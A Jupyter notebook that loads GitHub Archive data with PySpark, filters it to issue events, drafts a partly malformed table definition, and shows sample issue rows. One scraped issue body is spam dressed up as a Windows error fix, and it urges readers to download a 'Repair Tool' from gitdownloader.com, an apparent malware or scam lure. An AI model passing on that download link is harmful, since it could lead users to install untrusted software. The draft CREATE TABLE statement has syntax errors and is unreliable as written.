In [1]:
%load_ext sparksql_magic
from pyspark.sql import SparkSession

# Start Spark session
spark = (
    SparkSession.builder.appName("FilterGHJsonPYTHON")
    .config("spark.sql.catalogImplementation", "hive")
    .enableHiveSupport()
    .getOrCreate()
)

your 131072x1 screen size is bogus. expect trouble
25/02/26 07:00:12 WARN Utils: Your hostname, NathanBlade15 resolves to a loopback address: 127.0.1.1; using 10.255.255.254 instead (on interface lo)
25/02/26 07:00:12 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address
Setting default log level to "WARN".
To adjust logging level use sc.setLogLevel(newLevel). For SparkR, use setLogLevel(newLevel).
25/02/26 07:00:12 WARN NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
25/02/26 07:00:13 WARN Utils: Service 'SparkUI' could not bind on port 4040. Attempting port 4041.


In [2]:
from pyspark.sql.functions import col
df = spark.read.json("../data/*.json.gz")
# Filter for IssuesEvent
df = df.filter(df["type"] == "IssuesEvent")
df = df.select(
    col("actor"),
    col("created_at"),
    col("id").alias("event_id"),
    col("org"),
    col("payload.action"),
    col("payload.issue")
)

25/02/26 07:01:14 WARN SparkStringUtils: Truncated the string representation of a plan since it was too large. This behavior can be adjusted by setting 'spark.sql.debug.maxToStringFields'.


In [5]:
df.createOrReplaceTempView("df")
df.show()

+--------------------+--------------------+-----------+--------------------+--------+--------------------+
|               actor|          created_at|   event_id|                 org|  action|               issue|
+--------------------+--------------------+-----------+--------------------+--------+--------------------+
|{https://avatars....|2025-01-01T01:00:02Z|45186096107|                NULL|  opened|{NULL, NULL, [], ...|
|{https://avatars....|2025-01-01T01:00:02Z|45186096173|                NULL|  opened|{NULL, NULL, [], ...|
|{https://avatars....|2025-01-01T01:00:04Z|45186096455|                NULL|  opened|{NULL, NULL, [], ...|
|{https://avatars....|2025-01-01T01:00:04Z|45186096537|                NULL|  closed|{NULL, NULL, [], ...|
|{https://avatars....|2025-01-01T01:00:04Z|45186096631|{https://avatars....|  opened|{NULL, NULL, [], ...|
|{https://avatars....|2025-01-01T01:00:08Z|45186097554|                NULL|  opened|{NULL, NULL, [], ...|
|{https://avatars....|2025-01-01T01:0

## Build up the issues scd type II table

In [ ]:
%%sparksql
Create table if not exists scd_issues(
    user_id BIGINT,
    event_id BIGINT,
    org_id as BIGINT,
    action VARCHAR(8),
    issue STRUCT<url:STRING,repository_url:STRING,labels:ARRAY<STRUCT<name:STRING,color:STRING>>,comments_url:STRING,events_url:STRING,html_url:STRING,id:BIGINT,node_id:STRING,number:BIGINT,title:STRING,user:STRUCT<login:STRING,id:BIGINT,node_id:STRING,avatar_url:STRING,gravatar_id:String,url:String>,labels_url:String,state:String,locked:Boolean
    created_at TIMESTAMP
)

In [10]:
spark.sql("select issue.* from df").show()


+------------------+--------------------+--------------------+------------------+-----------------------------+--------------------+--------+--------------------+--------------------+-----+--------------------+--------------------+----------+--------------------+--------------------+------+---------+------------------+------+------------------------+------------+--------------------+--------------------+------+------------+------------------+--------------------+--------------------+--------------------+--------------------+--------------------+
|active_lock_reason|            assignee|           assignees|author_association|                         body|           closed_at|comments|        comments_url|          created_at|draft|          events_url|            html_url|        id|              labels|          labels_url|locked|milestone|           node_id|number|performed_via_github_app|pull_request|           reactions|      repository_url| state|state_reason|sub_issues_summary|  

In [19]:
%%sparksql
SELECT 
    issue.id AS issue_id,
    action,
    issue.title,
    issue.body,
    issue.state,
    issue.state_reason,
    issue.number,
    issue.labels,
    issue.assignee,
    issue.assignees,
    issue.author_association,
    issue.locked,
    issue.closed_at,
    issue.comments,
    issue.reactions,
    issue.created_at AS issue_created_at,
    issue.updated_at AS issue_updated_at,

    event_id,

    actor.id AS user_id,
    org.id AS org_id

FROM df;


only showing top 20 row(s)


issue_id,action,title,body,state,state_reason,number,labels,assignee,assignees,author_association,locked,closed_at,comments,reactions,issue_created_at,issue_updated_at,event_id,user_id,org_id
2764758647,opened,Check if time is accruate - 1735693200401,Please check if the time in `time_now.txt` file is synchronized with world clocks 1735693200401 and if there are any other issues in the repo.,open,null,12990,[],null,[],OWNER,False,null,0,"Row(+1=0, -1=0, confused=0, eyes=0, heart=0, hooray=0, laugh=0, rocket=0, total_count=0, url='https://api.github.com/repos/mo9a7i/time_now/issues/12990/reactions')",2025-01-01T01:00:00Z,2025-01-01T01:00:00Z,45186096107,1753262,null
2764758656,opened,"it's me again , could you share the latest source code , since want to check some parameters settings","Since too many new features added , want to learn some parameters usage Could you share it , thanks a lot, and Happy new year.",open,null,374,[],null,[],NONE,False,null,0,"Row(+1=0, -1=0, confused=0, eyes=0, heart=0, hooray=0, laugh=0, rocket=0, total_count=0, url='https://api.github.com/repos/Purfview/whisper-standalone-win/issues/374/reactions')",2025-01-01T01:00:01Z,2025-01-01T01:00:01Z,45186096173,2059858,null
2764758662,opened,Fixing HR 0x80072EE7 8200 in Windows,"The HR 0x80072EE7 8200 error commonly occurs in Windows when there are issues with updates or when trying to connect to online services. This error usually relates to a problem with the system’s connection to the server. Below are effective methods to resolve this issue. [![Download The Repair Tool](https://gitdownloader.com/download-button.jpg)](https://gitdownloader.com/download.php?hr-0x80072ee7-8200) ## Method 1: Adjust Date and Time Settings One reason for the HR 0x80072EE7 8200 error is incorrect date and time settings. This can cause connection issues with online services. Follow these steps: 1. Right-click on the date and time in the taskbar. 2. Select **Adjust date/time**. 3. Make sure that your time zone is correct. 4. Toggle **Set time automatically** and **Set time zone automatically** to on. 5. Click **Sync now** to synchronize your clock with the Internet time. Once your date and time settings are correct, check if the error persists. ## Method 2: Check Internet Connection A poor or unstable internet connection can also lead to the HR 0x80072EE7 8200 error. To verify your internet connection: 1. Open your web browser and try accessing a website. 2. If the website does not load, restart your modem and router. 3. If you use a VPN, try disconnecting it to see if it improves connectivity. 4. Once your internet connection is stable, check for updates again. If the error is resolved after ensuring a stable internet connection, you can continue using your device normally. ## Method 3: Use a Repair Tool A specialized repair tool can automatically address various system issues, including the HR 0x80072EE7 8200 error. Such tools can repair corrupted files, optimize performance, and remove malware. To download the repair tool, click the link below: 📥 [Download the Repair Tool](https://gitdownloader.com/download.php?hr-0x80072ee7-8200) Install the tool, then run a complete system scan. Follow the on-screen prompts to address detected issues. This process can help fix the error quickly. ## Method 4: Reset Windows Update Components Resetting Windows Update components can often resolve update-related errors. Here’s how to do it: 1. Open the Command Prompt as an administrator. 2. Stop the Windows Update service by typing `net stop wuauserv`, then press Enter. 3. Stop the Background Intelligent Transfer Service with `net stop bits`, then press Enter. 4. Stop the Cryptographic service by typing `net stop cryptsvc`, and press Enter. Next, rename the SoftwareDistribution and Catroot2 folders: 1. Type `ren C:\Windows\SoftwareDistribution SoftwareDistribution.old`, then press Enter. 2. Type `ren C:\Windows\System32\catroot2 Catroot2.old`, then press Enter. Restart the services: 1. Type `n

In [13]:
spark.sql("select issue.user.* from df").show()

+--------------------+--------------------+--------------------+--------------------+--------------------+-----------+--------------------+---------+---------------+--------------------+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----+--------------------+--------------+
|          avatar_url|          events_url|       followers_url|       following_url|           gists_url|gravatar_id|            html_url|       id|          login|             node_id|   organizations_url| received_events_url|           repos_url|site_admin|         starred_url|   subscriptions_url|type|                 url|user_view_type|
+--------------------+--------------------+--------------------+--------------------+--------------------+-----------+--------------------+---------+---------------+--------------------+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----+-----